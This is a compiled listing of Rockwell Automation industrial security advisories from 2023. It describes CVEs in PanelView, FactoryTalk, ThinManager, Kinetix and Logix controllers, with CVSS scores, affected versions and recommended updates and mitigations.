A cross site scripting vulnerability was discovered that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.

CVSS Base Score: 5.5 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29025 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation

CVE-2023-29026 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation

CVE-2023-29027 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation

CVE-2023-29028 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation

CVE-2023-29029 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation

CVE-2023 29022 IMPACT
A cross site scripting vulnerability was discovered that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.

CVSS Base Score: 4.7 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-20 Improper Input Validation


Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Additional Resources

Critical
PN1623 | PN1623 | PanelView™ 800 – Remote Code Execution Vulnerabilities
Published Date:
May 11, 2023
Last Updated:
May 11, 2023
CVE IDs:
CVE-2019-16748, CVE-2020-36177
Products:
PanelView 800
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
PanelView™ 800 - 2711R-T4T V5.011 V8.011
PanelView™ 800 - 2711R-T7T V5.011 V8.011
PanelView™ 800 - 2711R-T10T V5.011 V8.011

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2020-36177 IMPACT
RsaPad_PSS in WolfSSL before 4.6.0 has an out-of-bounds write for certain relationships between key size and digest size.  This is utilized in the PanelView™ 800 and could allow an attacker to accomplish a heap buffer overflow if the user has the email feature enabled in the project file where WolfSSL is used.  This feature is disabled by default.

CVSS Base Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-787 Out-Of-Bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2019-16748 IMPACT
In WolfSSL through 4.1.0, there is a missing sanity check of memory accesses in parsing ASN.1 certificate data while handshaking. Specifically, there is a one-byte heap-based buffer over-read in CheckCertSignature ex in wolfcrypt/src/asn.c.  WolfSSL is utilized in the PanelView™ 800 and could allow an attacker to accomplish a heap buffer overflow if the user has the email feature enabled in the project file where WolfSSL is used.  This feature is disabled by default.

CVSS Base Score: 9.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-125 Out-Of-Bounds Read

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Additional Resources

High
PN1626 | PN1626 | Cross Site Request Forgery in FactoryTalk® Vantagepoint®
Published Date:
May 11, 2023
Last Updated:
May 11, 2023
CVE IDs:
CVE-2023-2444
Products:
FactoryTalk VantagePoint
CVSS Scores:
7.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product First Known in Software Version Corrected in Software Version
FactoryTalk® Vantagepoint® <v8.40 V8.40 and later

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-2444 IMPACT
A cross site request forgery vulnerability exists in the affected product. This vulnerability can be exploited in two ways. If an attacker sends a malicious link to a computer that is on the same domain as the FactoryTalk® Vantagepoint® server and a user clicks the link, the attacker could impersonate the legitimate user and send requests to the affected product.

Additionally, if an attacker sends an untrusted link to a computer that is not on the same domain as the server and a user opens the FactoryTalk® Vantagepoint® website, enters credentials for the FactoryTalk® Vantagepoint® server, and clicks on the malicious link a cross site request forgery attack would be successful as well.

CVSS Base Score: 7.1/10
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:H
CWE: CWE-345 Insufficient Verification of Data Authenticity

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are also encouraged to implement our suggested security best practices to minimize risk associated with the vulnerability.

Additional Resources

Critical
PN1624 | Open Ports Vulnerability in Kinetix 5500 EtherNet/IP Servo Drive
Published Date:
May 11, 2023
Last Updated:
October 16, 2024
CVE IDs:
CVE-2023-1834
Products:
2198 Kinetix 5500 Drive
CVSS Scores (v3.1):
9.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 11, 2023

Affected Products

Affected Product First Known in Firmware Revision Corrected in Firmware Revision
Kinetix 5500 manufactured between May 2022 and January 2023

*The manufacturing date of the drive is stated on the product label.		 v7.13 Customers should upgrade to versions v7.14 or later to close the ports, which mitigates this issue.

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-1834 IMPACT
Rockwell Automation was made aware that Kinetix® 5500 drives, manufactured between May 2022 and January 2023, and are running v7.13 may have the telnet and FTP ports open by default.

CVSS Base Score: 9.4/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
CWE: CWE 284 Improper Access Control

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Risk Mitigation & User Action

Customers using the affected drives are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customer to implement our suggested security best practices to minimize risk of the vulnerability.

Additional Resources

 

High
PN1621 | PN1621 | Arena® Simulation – Multiple Vulnerabilities
Published Date:
May 09, 2023
Last Updated:
May 09, 2023
CVE IDs:
CVE-2023-29460, CVE-2023-29462, CVE-2023-29461
Products:
Arena
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - May 9, 2023

Affected Products

Affected Product (automated) First Known in Software Version Corrected in Software Version
Arena® Simulation Software V16.00 16.20.01

Vulnerability Details

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-29460 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow.
CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29461 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow in the heap.
CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer

Known Exploited Vulnerability (KEV) database: No

CVE-2023-29462 IMPACT
An arbitrary code execution vulnerability was reported to Rockwell Automation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow in the heap.
CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119 Incorrect Restriction of Operations in the Memory Buffer

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Risk Mitigation & User Action

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

Additional Resources

Critical
PN1410 | PN1410 | FactoryTalk® Diagnostics Vulnerable to Remote Code Execution
Published Date:
April 10, 2023
Last Updated:
April 10, 2023
CVE IDs:
CVE-2020-6967
Products:
FactoryTalk Services Platform
CVSS Scores:
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.3
Revision History
Version 1.0 – February 20, 2020. Initial Release
Version 1.1 – June 18, 2020. Pwn2Own Co-Discovery
Version 1.2 – February 10, 2023
Version 1.3 – April 10, 2023 – Added v6.31 Mitigations

Executive Summary

The Zero Day Initiative (ZDI), part of the information security company Trend Micro, reported a remote code execution (RCE) vulnerability in FactoryTalk® Services Platform to Rockwell Automation. Specifically, the vulnerability is found in the FactoryTalk Diagnostics subsystem, which provides customers the functionality to collect and view diagnostic messages from the FactoryTalk system for analysis and troubleshooting purposes.


FactoryTalk Diagnostics is utilized by many Rockwell Automation® products. We encourage customers to follow the steps provided to understand if they are affected.

Special thanks to rgod of 9sg working with ZDI to find this vulnerability. This vulnerability was co-discovered during the first ever Industrial Control Systems (ICS) Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI).

Affected Products

FactoryTalk Services Platform (v2.00 – v6.11)
The FactoryTalk Services Platform is delivered as part of the FactoryTalk suite of software from Rockwell Automation. Including most products branded FactoryTalk or Studio 5000® software.

Vulnerability Details

CVE-2020-6967: Remote Code Execution due to Vulnerable .NET Remoting Instance
FactoryTalk Diagnostics exposes a remote network port at tcp/8082, which may allow an attacker to execute arbitrary code with SYSTEM level privileges.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS Vector String: AV:N/AC:L/PR:N/UI:N/SC:U/C:H/I:H/A:H
ZDI Tracking: ZDI-CAN-10268

Risk Mitigation & User Action

Rockwell Automation will resolve this vulnerability in the next release of the FactoryTalk Services Platform. Until then, customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the PN1354 - Industrial Security Advisory Index to stay notified.

Update: The vulnerability has been resolved with the release of FactoryTalk Services Platform V6.31.

Product Family Suggested Actions
FactoryTalk Services Platform V6.31
  • No actions are necessary:
    • Version supports use of Microsoft Windows Communication Foundation (WCF) which avoids the vulnerability.
    • Version supports use of .NET Remoting (system default) with connections restricted to a local port; mitigating the vulnerability.

Product Family

Suggested Actions

FactoryTalk Services Platform V2.00 – V6.11

We have provided guidance for customers affected by this vulnerability to assess whether the service is installed, and steps for implementing the recommended mitigations. Customers should consider implementing the following measures based on their needs:

  • Upgrade to FactoryTalk Services Platform V6.31.
  • Recommended action for versions that predate v6.20 upgrade to version 6.20 or later; this version restricts connection settings to only the local port. If it is not possible to update:
  • Alternately for versions 2.74, 2.80, 2.81, 2.90, 3.00, 6.10, or 6.11, install the patch at BF24822 - Patch: FactoryTalk Diagnostics Local Reader service connection settings restricted to local access only, FactoryTalk Services 6.11, 6.10, 3.00, 2.90, 2.80, 2.81, 2.74 to restrict connections settings to only the local port.
  • For versions that predate v2.74 it is recommended to upgrade to a more recent version.
  • Disable the Remote Diagnostics Service if this service is not in use. Disabling this service does not result in data loss.
  • If the service is in use, use Windows Firewall configuration to help prevent remote connection to the effected port.
  • Steps to perform both solutions can be found in Risk mitigation for FactoryTalk Diagnostics remoting endpoint.

Note: A Snort rule for this issue is available in Snort’s developer rules (sid: 32474).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that .NET Remoting from unauthorized sources are blocked.
  • Ensure that software-based firewalls are running with current rule sets and enforced on individual systems.
  • Consider implementing network security protocols for software systems, such as IPSec. Documentation is available in QA46277 - Deploying FactoryTalk Software with IPsec, outlining guidelines for implementing IPSec with FactoryTalk applications.

Software/PC-based Mitigation Strategies

  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available in QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Mitigations

  • Use trusted software, software patches antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the PN1354 - Industrial Security Advisory Index for Rockwell Automation.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

Critical
PN1618 | PN1618 | ThinManager Software Path Traversal and Denial-Of-Service Attack
Published Date:
March 21, 2023
Last Updated:
March 21, 2023
CVE IDs:
CVE-2023-27855, CVE-2023-27857, CVE-2023-27856, CVE-2023-28757
Products:
ThinManager
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – March 21, 2023 – Initial Version

Executive Summary

A vulnerability was discovered by Tenable Security Researchers and reported to Rockwell Automation. The vulnerability was discovered in the ThinManager® ThinServer™ software. Successful exploitation of this vulnerability could allow an attacker to potentially perform remote code execution on the target or crash the software.

Customers using the products in scope are encouraged to evaluate the mitigations provided and apply them appropriately to their deployed products. See the additional details relating to the discovered vulnerabilities, including recommended countermeasures.

Affected Products

ThinManager ThinServer software Versions
6.x – 10.x
11.0.0 – 11.0.5
11.1.0 – 11.1.5
11.2.0 – 11.2.6
12.0.0 – 12.0.4
12.1.0 – 12.1.5
13.0.0-13.0.1

Vulnerability Details

CVE 2023-27855 ThinManager ThinServer Path Traversal Upload

CVSS Base Score: 9.8 /10 (Critical)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

In affected versions, a path traversal exists when processing a message. An unauthenticated remote attacker could potentially exploit this vulnerability to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious content, potentially causing remote code execution.

CVE 2023-27856 ThinManager ThinServer Path Traversal Download

CVSS Base Score: 7.5 /10 (High)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

In affected versions, a path traversal exists when processing a message of type 8. An unauthenticated remote attacker can exploit this vulnerability to download arbitrary files on the disk drive where ThinServer.exe is installed.

CVE 2023-27857 ThinManager ThinServer Heap-Based Buffer Overflow

CVSS Base Score: 7.5/10 (High)
CVSS 3.1 Vector String: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

In affected versions, a heap-based buffer over-read condition occurs when the message field indicates more data than is present in the message field. An unauthenticated remote attacker can exploit this vulnerability to crash ThinServer.exe due to a read access violation.

Risk Mitigation & User Action

Customers are directed towards the risk mitigations provided, and are encouraged, when possible, to combine these mitigations with the general security guidelines to employ multiple strategies simultaneously.
CVE-2023-27855
CVE-2023-27856
CVE-2023-27857		 First Known Affected Fixed Versions
6.x – 10.x These versions are retired. Please update to the supported version.
11.0.0 – 11.0.5 Update to v11.0.6
11.1.0 – 11.1.5 Update to v11.1.6
11.2.0 – 11.2.6 Update to v11.2.7
12.0.0 – 12.0.4 Update to v12.0.5
12.1.0 – 12.1.5 Update to v12.1.6
13.0.0 – 13.0.1 Update to v13.0.2

Additional Mitigations

If customers are unable to update to the patched version, the following mitigations should be put in place:
  • Limiting remote access to TCP port 2031 to known thin clients and ThinManager servers would limit some access to exploit this vulnerability.

For additional security best practices, please see our Knowledgebase article, QA43240 - Recommended Security Guidelines from Rockwell Automation, to maintain the security posture of your environment.

References

Medium
PN1619 | Modbus TCP AOI Server Could Leak Sensitive Information
Published Date:
March 16, 2023
Last Updated:
October 16, 2024
CVE IDs:
CVE-2023-0027
Products:
1768/1769/5069 CompactLogix, 1756 ControlLogix
CVSS Scores (v3.1):
5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.0
Revision History
Version 1.0 – March 16, 2023

Executive Summary

Rockwell Automation received a report from researchers at Veermata Jijabai Technological Institute of a vulnerability that was contained within the Modbus TCP Server Add-On Instructions (AOI) for ControlLogix® and CompactLogix™ controllers. This vulnerability may allow an unauthorized user to gain information when the Modbus TCP Server AOI accepts a malformed request.

Customers using affected versions of this software are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • Modbus TCP Server Add-On Instruction (AOI) for ControlLogix and CompactLogix controllers, used to connect to other devices via Modbus TCP protocol. Rockwell Automation Sample Code Library ID:101037.
    • Customers who do not use the AOI with a controller are not impacted.
    • The Modbus TCP Client AOI, that is a part of this sample code library, does not have this vulnerability.

Vulnerability Details

CVE-2023-0027 Rockwell Automation Modbus TCP Server Add-On Instruction Could Leak Sensitive Information
While the Modbus TCP Server AOI is in use, an unauthorized user could potentially send a malformed message causing the controller to respond with a copy of the most recent response to the last valid request. If exploited, an attacker could read the connected device’s Modbus TCP Server AOI information. It is impossible to exploit this vulnerability without knowing the Modbus address of the last valid request.


CVSS v3.1 Base Score: 5.3/10[medium]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Risk Mitigation & User Action

Customers using the products in scope are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products.
Products Affected First Known Version Affected Corrected In
Modbus TCP Add-On Instructions (AOI) Sample Code 2.00.00 This issue has been mitigated in the following AOI versions: 2.04.00 and later

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines from Rockwell Automation.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

Disclaimer

This document is intended to provide general technical information on a particular subject or subjects and is not an exhaustive treatment of such subjects. Accordingly, the information in this document is not intended to constitute application, design, software or other professional engineering advice or services. Before making any decision or taking any action, which might affect your equipment, you should consult a qualified professional advisor.

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS DOCUMENT AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL AUTOMATION BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOST PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAS BEEN ADVISED OFTHE POSSIBILITY OF SUCH DAMAGES.

ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. NOTE THAT CERTAIN JURISDICTIONS DO NOT COUNTENANCE THE EXCLUSION OF IMPLIED WARRANTIES; THUS, THIS DISCLAIMER MAY NOT APPLY TO YOU.

 

Medium
PN1554 | PN1554 | CompactLogix 5370 and ControlLogix 5570 Controllers Vulnerable to Denial of Service Conditions due to Improper Input Validation
Published Date:
February 07, 2023
Last Updated:
February 07, 2023
CVE IDs:
CVE-2020-6998
Products:
1769 Compact GuardLogix 5370, 1769 CompactLogix 5370
CVSS Scores:
5.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.2
Revision History
Version 1.0 – March 2, 2021. Initial Release
Version 1.2 – February 7, 2023 - Updated affected products and risk mitigations section

Executive Summary

CompactLogix™ 5370 and ControlLogix® 5570 Programmable Automation Controllers (PACs) contain a vulnerability in the connection establishment algorithm that could allow a remote, unauthenticated attacker to cause infinite wait times in communications with other products resulting in denial of service conditions. The Cybersecurity & Infrastructure Security Agency (CISA) reported this vulnerability to Rockwell Automation by way of an anonymous researcher.

Customers using the affected products are strongly encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

The following products are affected:
  • CompactLogix 5370
  • Compact GuardLogix 5370
  • ControlLogix 5570
  • ControlLogix 5570 redundancy
  • GuardLogix 5570

Vulnerability Details

CVE-2020-6998: Improper Input Validation Causes Denial of Service Condition
The connection establishment algorithm found in CompactLogix 5370 and ControlLogix 5570 does not sufficiently manage its control flow during execution, creating an infinite loop. This may allow an attacker to send specially crafted CIP™ packet requests to a controller, which may cause denial of service conditions in communications with other products.

CVSS v3.1 Base Score: 5.8/10 [MEDIUM]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE-2020-6998
Products Affected First Known Version Affected Corrected In
CompactLogix 5370
ControlLogix 5570
GuardLogix 5570
 20.011 33.011 and later
Compact GuardLogix 5370 28.011 33.011 and later
ControlLogix 5570 Redundancy 20.054 33.051 and later

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.

General Mitigations
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS

Critical
PN1616 | PN1616 | CVE-2019-5096 and CVE 2019-5097 Vulnerabilities Impact Multiple Products
Published Date:
January 27, 2023
Last Updated:
January 27, 2023
CVE IDs:
CVE-2019-5097, CVE-2019-5096
Products:
1768/1769/5069 CompactLogix, 1769 Compact I/O, 1732E ArmorBlock I/O, 1756 ControlLogix, 1769 CompactLogix Controllers, 1747 SLC 500, 1756/1769/5069/2080 Chassis-based I/O, 1769 Compact GuardLogix 5370, 1756/5069 GuardLogix
CVSS Scores:
7.5, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – January 27, 2023

Executive Summary

Rockwell Automation is aware of multiple products that utilize the GoAhead web server application and are affected by CVE 2019-5096 and CVE 2019-5097. Exploitation of these vulnerabilities could potentially have a high impact on the confidentiality, integrity and availability of the vulnerable devices. We have not received any notice of these vulnerabilities being exploited in Rockwell Automation products.

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerabilities, including impact and recommended countermeasures, are provided.

Affected Products

CVE -2019-5096 and CVE 2019-5097

Catalog Number Firmware Version
1732E-8CFGM8R/A 1.012
1732E-IF4M12R/A (discontinued) 1.012
1732E-IR4IM12R/A 1.012
1732E-IT4IM12R/A 1.012
1732E-OF4M12R/A 1.012
1732E-OB8M8SR/A 1.013
1732E-IB8M8SOER 1.012
1732E-8IOLM12R 2.011
1747-AENTR 2.002
1769-AENTR 1.001
5069-AEN2TR 3.011
1756-EN2TR/C <=11.001
1756-EN2T/D <=11.001
1756-EN2TSC/B (discontinued) 10.01
1756-EN2TSC/B 10.01
1756-HIST1G/A (discontinued) <=3.054
1756-HIST2G/A(discontinued) <=3.054
1756-HIST2G/B <=5.103

CVE 2019 -5097

Catalog Number Firmware Version
ControlLogix® 5580 controllers V28 – V32*
GuardLogix® 5580 controllers V31 – V32*
CompactLogix™ 5380 controllers V28 – V32*
Compact GuardLogix 5380 controllers V31 – V32*
CompactLogix 5480 controllers V32*
1756-EN2T/D 11.001*
1756-EN2TR/C 11.001*
1765–EN3TR/B 11.001*
1756-EN2F/C 11.001*
1756-EN2TP/A 11.001*

* The vulnerability is only exploitable via the Ethernet port. It is not exploitable via backplane or USB communications.

Vulnerability Details

Rockwell Automation was made aware of two third-party vulnerabilities that affect the GoAhead embedded web server. A critical vulnerability (CVE-2019-5096) exists in the way requests are processed by the web server. If exploited, a malicious user could potentially leverage this vulnerability to execute arbitrary code   by sending specially crafted HTTP requests to the targeted device.

Additionally, a denial-of-service (DoS) vulnerability (CVE-2019 5097) exists in the GoAhead web server. To exploit this vulnerability, a malicious user would have to send specially crafted HTTP requests and trigger an infinite loop in the process. If exploited, the targeted device could potentially crash.

CVE 2019-5096 EmbedThis GoAhead web server code execution vulnerability
CVSS Base Score:  9.8/10 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE 2019-5097 EmbedThis GoAhead web server denial-of-service vulnerability
CVSS Base Score:  7.5/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

We encourage customers to apply the recommended mitigations, provided below.
Product Suggested Actions
1732E-8CFGM8R/A Refer to Additional Mitigations
1732E-IF4M12R/A Refer to Additional Mitigations
1732E-IR4IM12R/A Refer to Additional Mitigations
1732E-IT4IM12R/A Refer to Additional Mitigations
1732E-OF4M12R/A Refer to Additional Mitigations
1732E-OB8M8SR/A Refer to Additional Mitigations
1732E-IB8M8SOER Refer to Additional Mitigations
1732E-8IOLM12R Refer to Additional Mitigations
1747-AENTR Refer to Additional Mitigations
1769-AENTR Update to 1.003 or later
5069-AEN2TR (discontinued) Migrate to the 5069-AENTR
1756-EN2T/D Update to 11.002 or later
1756-EN2TR/C Update to 11.002 or later
1756-EN3TR/B Update to 11.002 or later
1756-EN2F/C Update to 11.002 or later
1756-EN2TP/A Update to 11.002 or later
1756-EN2TSC/B Refer to Additional Mitigations
1756-HIST1G/A (discontinued) Update to series B v5.104 or C 7.100 or later
1756-HIST2G/A (discontinued) Update to series B v5.104 or C 7.100 or later
1756-HIST2G/B Update to 5.104 or later
